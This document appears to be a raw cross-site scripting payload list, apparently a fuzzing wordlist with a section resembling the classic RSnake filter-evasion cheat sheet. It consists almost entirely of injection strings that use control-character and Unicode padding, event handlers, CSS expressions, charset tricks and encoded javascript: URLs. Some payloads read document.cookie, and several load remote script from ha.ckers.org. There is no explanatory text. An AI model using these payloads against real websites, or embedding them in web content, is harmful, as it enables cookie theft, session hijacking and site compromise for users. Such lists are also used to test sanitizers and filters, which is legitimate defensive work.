 
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
 
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
 
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
 
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
 
"`'><script>\x3Bjavascript:alert(1)</script>
 
"`'><script>\x0Djavascript:alert(1)</script>
 
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
 
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
 
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
 
"`'><script>\x09javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
 
"`'><script>\x00javascript:alert(1)</script>
 
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
 
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
 
"`'><script>\x0Cjavascript:alert(1)</script>
 
"`'><script>\x2Bjavascript:alert(1)</script>
 
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
 
"`'><script>-javascript:alert(1)</script>
 
"`'><script>\x0Ajavascript:alert(1)</script>
 
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
 
"`'><script>\x7Ejavascript:alert(1)</script>
 
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
 
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
 
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
 
"`'><script>\xC2\x85javascript:alert(1)</script>
 
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
 
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
 
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
 
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
 
"`'><script>\x21javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
 
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
 
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
 
"`'><script>\x0Bjavascript:alert(1)</script>
 
"`'><script>\x20javascript:alert(1)</script>
 
"`'><script>\xC2\xA0javascript:alert(1)</script>
 
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
 
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
 
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
 
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
 
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
 
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
 
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
 
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
 
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
 
<script\x2F>javascript:alert(1)</script>
 
<script\x20>javascript:alert(1)</script>
 
<script\x0D>javascript:alert(1)</script>
 
<script\x0A>javascript:alert(1)</script>
 
<script\x0C>javascript:alert(1)</script>
 
<script\x00>javascript:alert(1)</script>
 
<script\x09>javascript:alert(1)</script>
 
"><img src=x onerror=javascript:alert(1)>
 
"><img src=x onerror=javascript:alert('1')>
 
"><img src=x onerror=javascript:alert("1")>
 
"><img src=x onerror=javascript:alert(`1`)>
 
"><img src=x onerror=javascript:alert(('1'))>
 
"><img src=x onerror=javascript:alert(("1"))>
 
"><img src=x onerror=javascript:alert((`1`))>
 
"><img src=x onerror=javascript:alert(A)>
 
"><img src=x onerror=javascript:alert((A))>
 
"><img src=x onerror=javascript:alert(('A'))>
 
"><img src=x onerror=javascript:alert('A')>
 
"><img src=x onerror=javascript:alert(("A"))>
 
"><img src=x onerror=javascript:alert("A")>
 
"><img src=x onerror=javascript:alert((`A`))>
 
"><img src=x onerror=javascript:alert(`A`)>
 
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
 
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
 
<script>javascript:alert(1)<\x00/script>
 
<img src=# onerror\x3D"javascript:alert(1)" >
 
<input onfocus=javascript:alert(1) autofocus>
 
<input onblur=javascript:alert(1) autofocus><input autofocus>
 
<video poster=javascript:javascript:alert(1)//
 
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
 
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
 
<video><source onerror="javascript:javascript:alert(1)">
 
<video onerror="javascript:javascript:alert(1)"><source>
 
<form><button formaction="javascript:javascript:alert(1)">X
 
<body oninput=javascript:alert(1)><input autofocus>
 
<math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
 
<frameset onload=javascript:alert(1)>
 
<table background="javascript:javascript:alert(1)">
 
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
 
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
 
<![><img src="]><img src=x onerror=javascript:alert(1)//">
 
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
 
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
 
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
 
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
 
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
 
<object data="data:text/html;base64,%(base64)s">
 
<embed src="data:text/html;base64,%(base64)s">
 
<b <script>alert(1)</script>0
 
<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
 
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
 
<embed src="javascript:alert(1)">
 
<img src="javascript:alert(1)">
 
<image src="javascript:alert(1)">
 
<script src="javascript:alert(1)">
 
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
 
<? foo="><script>javascript:alert(1)</script>">
 
<! foo="><script>javascript:alert(1)</script>">
 
</ foo="><script>javascript:alert(1)</script>">
 
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
 
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
 
<% foo><x foo="%><script>javascript:alert(1)</script>">
 
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
 
<img \x00src=x onerror="alert(1)">
 
<img \x47src=x onerror="javascript:alert(1)">
 
<img \x11src=x onerror="javascript:alert(1)">
 
<img \x12src=x onerror="javascript:alert(1)">
 
<img\x47src=x onerror="javascript:alert(1)">
 
<img\x10src=x onerror="javascript:alert(1)">
 
<img\x13src=x onerror="javascript:alert(1)">
 
<img\x32src=x onerror="javascript:alert(1)">
 
<img\x47src=x onerror="javascript:alert(1)">
 
<img\x11src=x onerror="javascript:alert(1)">
 
<img \x47src=x onerror="javascript:alert(1)">
 
<img \x34src=x onerror="javascript:alert(1)">
 
<img \x39src=x onerror="javascript:alert(1)">
 
<img \x00src=x onerror="javascript:alert(1)">
 
<img src\x09=x onerror="javascript:alert(1)">
 
<img src\x10=x onerror="javascript:alert(1)">
 
<img src\x13=x onerror="javascript:alert(1)">
 
<img src\x32=x onerror="javascript:alert(1)">
 
<img src\x12=x onerror="javascript:alert(1)">
 
<img src\x11=x onerror="javascript:alert(1)">
 
<img src\x00=x onerror="javascript:alert(1)">
 
<img src\x47=x onerror="javascript:alert(1)">
 
<img src=x\x09onerror="javascript:alert(1)">
 
<img src=x\x10onerror="javascript:alert(1)">
 
<img src=x\x11onerror="javascript:alert(1)">
 
<img src=x\x12onerror="javascript:alert(1)">
 
<img src=x\x13onerror="javascript:alert(1)">
 
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
 
<img src=x onerror=\x09"javascript:alert(1)">
 
<img src=x onerror=\x10"javascript:alert(1)">
 
<img src=x onerror=\x11"javascript:alert(1)">
 
<img src=x onerror=\x12"javascript:alert(1)">
 
<img src=x onerror=\x32"javascript:alert(1)">
 
<img src=x onerror=\x00"javascript:alert(1)">
 
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
 
<img src="x` `<script>javascript:alert(1)</script>"` `>
 
<img src onerror /" '"= alt=javascript:alert(1)//">
 
<title onpropertychange=javascript:alert(1)></title><title title=>
 
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
 
<!--[if]><script>javascript:alert(1)</script -->
 
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
 
<script src="/\%(jscript)s"></script>
 
<script src="\\%(jscript)s"></script>
 
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
 
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
 
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
 
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
 
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
 
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
 
<style>*[{}@import'%(css)s?]</style>X
 
<div style="font-family:'foo&#10;;color:red;';">XXX
 
<div style="font-family:foo}color=red;">XXX
 
<// style=x:expression\28javascript:alert(1)\29>
 
<style>*{x:expression(javascript:alert(1))}</style>
 
<div style=content:url(%(svg)s)></div>
 
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
 
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
 
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
 
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
 
<div id="x">XXX</div> <style>  #x{font-family:foo[bar;color:green;}  #y];color:red;{}  </style>
 
<x style="background:url('x&#1;;color:red;/*')">XXX</x>
 
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
 
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
 
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
 
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
 
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
 
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
 
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
 
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
 
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
 
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
 
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
 
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
 
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
 
<x style="behavior:url(%(sct)s)">
 
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
 
<event-source src="%(event)s" onload="javascript:alert(1)">
 
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
 
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
 
<script>%(payload)s</script>
 
<script src=%(jscript)s></script>
 
<script language='javascript' src='%(jscript)s'></script>
 
<script>javascript:alert(1)</script>
 
<IMG SRC="javascript:javascript:alert(1);">
 
<IMG SRC=javascript:javascript:alert(1)>
 
<IMG SRC=`javascript:javascript:alert(1)`>
 
<SCRIPT SRC=%(jscript)s?<B>
 
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
 
<BODY ONLOAD=javascript:alert(1)>
 
<BODY ONLOAD=javascript:javascript:alert(1)>
 
<IMG SRC="jav ascript:javascript:alert(1);">
 
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
 
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
 
<<SCRIPT>%(payload)s//<</SCRIPT>
 
<IMG SRC="javascript:javascript:alert(1)"
 
<iframe src=%(scriptlet)s <
 
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
 
<IMG DYNSRC="javascript:javascript:alert(1)">
 
<IMG LOWSRC="javascript:javascript:alert(1)">
 
<BGSOUND SRC="javascript:javascript:alert(1);">
 
<BR SIZE="&{javascript:alert(1)}">
 
<LAYER SRC="%(scriptlet)s"></LAYER>
 
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
 
<STYLE>@import'%(css)s';</STYLE>
 
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
 
<XSS STYLE="behavior: url(%(htc)s);">
 
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
 
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
 
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
 
<TABLE BACKGROUND="javascript:javascript:alert(1)">
 
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
 
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
 
<DIV STYLE="width:expression(javascript:alert(1));">
 
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
 
<XSS STYLE="xss:expression(javascript:alert(1))">
 
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
 
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
 
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
 
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
 
<BASE HREF="javascript:javascript:alert(1);//">
 
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
 
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
 
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
 
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>
 
<SCRIPT SRC="%(jpg)s"></SCRIPT>
 
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
 
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
 
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
 
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
 
<STYLE>@import'%(css)s';</STYLE>
 
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
 
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
 
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
 
<style onreadystatechange=javascript:javascript:alert(1);></style>
 
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
 
<embed code=%(scriptlet)s></embed>
 
<embed code=javascript:javascript:alert(1);></embed>
 
<embed src=%(jscript)s></embed>
 
<frameset onload=javascript:javascript:alert(1)></frameset>
 
<object onerror=javascript:javascript:alert(1)>
 
<embed type="image" src=%(scriptlet)s></embed>
 
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
 
<IMG SRC=&{javascript:alert(1);};>
 
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
 
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
 
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
 
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
 
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
 
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 
'';!--"<XSS>=&{()}
 
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG SRC=javascript:alert('XSS')>
 
<IMG SRC=JaVaScRiPt:alert('XSS')>
 
<IMG SRC=javascript:alert("XSS")>
 
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
 
<a onmouseover="alert(document.cookie)">xxs link</a>
 
<a onmouseover=alert(document.cookie)>xxs link</a>
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
<IMG SRC=# onmouseover="alert('xxs')">
 
<IMG SRC= onmouseover="alert('xxs')">
 
<IMG onmouseover="alert('xxs')">
 
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
 
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 
<IMG SRC="jav ascript:alert('XSS');">
 
<IMG SRC="jav&#x09;ascript:alert('XSS');">
 
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
 
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
 
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
 
<IMG SRC=" &#14;  javascript:alert('XSS');">
 
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
 
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 
<<SCRIPT>alert("XSS");//<</SCRIPT>
 
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
 
<SCRIPT SRC=//ha.ckers.org/.j>
 
<IMG SRC="javascript:alert('XSS')"
 
<iframe src=http://ha.ckers.org/scriptlet.html <
 
\";alert('XSS');//
 
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
<BODY BACKGROUND="javascript:alert('XSS')">
 
<IMG DYNSRC="javascript:alert('XSS')">
 
<IMG LOWSRC="javascript:alert('XSS')">
 
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
 
<IMG SRC='vbscript:msgbox("XSS")'>
 
<IMG SRC="livescript:[code]">
 
<BODY ONLOAD=alert('XSS')>
 
<BGSOUND SRC="javascript:alert('XSS');">
 
<BR SIZE="&{alert('XSS')}">
 
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
 
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
 
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
 
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
 
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
 
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
 
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
 
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
 
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 
<XSS STYLE="xss:expression(alert('XSS'))">
 
<XSS STYLE="behavior: url(xss.htc);">
 
¼script¾alert(¢XSS¢)¼/script¾
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
 
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
 
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
 
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
 
<TABLE BACKGROUND="javascript:alert('XSS')">
 
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
 
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
 
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
 
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
 
<DIV STYLE="width: expression(alert('XSS'));">
 
<BASE HREF="javascript:alert('XSS');//">
 
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
 
